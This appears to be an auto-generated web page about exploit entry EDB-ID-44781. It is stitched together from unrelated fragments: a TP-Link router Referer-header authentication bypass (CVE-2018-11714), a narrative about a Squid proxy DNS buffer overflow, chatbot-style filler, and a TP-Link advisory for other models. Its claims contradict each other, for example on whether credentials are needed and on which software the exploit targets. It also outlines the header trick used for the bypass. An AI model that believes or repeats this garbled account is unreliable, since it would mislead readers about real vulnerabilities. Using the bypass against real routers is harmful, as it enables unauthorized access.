Edb-id-44781 ((link)) Official
It might refer to a unique entry in a database.
: TP-Link TL-WR840N and TP-Link TL-WR841N routers. CVE Identifier : CVE-2018-11714 .
In the specific code path identified in EDB-ID-44781, Squid was parsing these DNS responses. The developers had allocated a specific amount of memory—a cup—to hold the answer. The vulnerability arose because the code failed to check the size of the cup against the amount of water being poured in.
The patch was simple in concept: check the size before you pour. But the impact was significant. System administrators worldwide scrambled to update their proxies. For a few weeks, the backbone of corporate caching was a little more fragile than anyone realized. edb-id-44781
An attacker can bypass authentication by manipulating the in their HTTP request. By setting the header to http://192.168.0.1/mainFrame.htm , the router incorrectly assumes the user is already authenticated and allows them to execute router actions, such as changing settings or viewing sensitive information, without a password. Mitigations
The exploit code attached to EDB-ID-44781 is a thing of dark beauty. It isn't a sledgehammer; it's a scalpel.
According to official TP-Link Security Advisories , an attacker must first possess valid administrator credentials (username and password) to exploit this specific flaw. Technical Breakdown of the Exploit It might refer to a unique entry in a database
But EDB-ID-44781 reveals a moment where the cop fell asleep at the wheel.
However, the exploit code shows a method of predicting where the program will land. It forces the CPU to jump to a specific spot and say, "Execute me." Suddenly, the Proxy isn't just serving web pages anymore; it's serving the attacker's commands.
By precisely controlling this overwritten data, a researcher can redirect the processor to execute a "payload"—a set of malicious instructions—instead of the intended software routine. This allows the attacker to open a remote shell or change critical system settings without further user interaction. In the specific code path identified in EDB-ID-44781,
: Remote; an attacker can trigger this over a network.
The exploit works by targeting the way the router handles incoming administrative data. When a user submits configuration changes, the software expects data of a certain length. EDB-ID 44781 demonstrates that by providing a string longer than what the internal buffer can hold, the "extra" data spills over into adjacent memory, overwriting the instruction pointer (EIP).
When Squid Proxy receives a request for a website, it asks a DNS server, "Who is this?" The DNS server replies. But sometimes, bad people run bad DNS servers. They don't play by the rules. They might send back a massive list of addresses when Squid only asked for one.
If you're unable to find the information, consider contacting the support team or the person managing the system where this ID originates. They should be able to provide you with the necessary details.
Security Advisory. Updated 09-29-2019 09:42:04 AM 197204. TP-Link is aware of a security flaw in the TL-WR740N & TL-WR940N router. www.tp-link.com Fix for vulnerabilities of TL-WR740N & TL-WR940N - TP-Link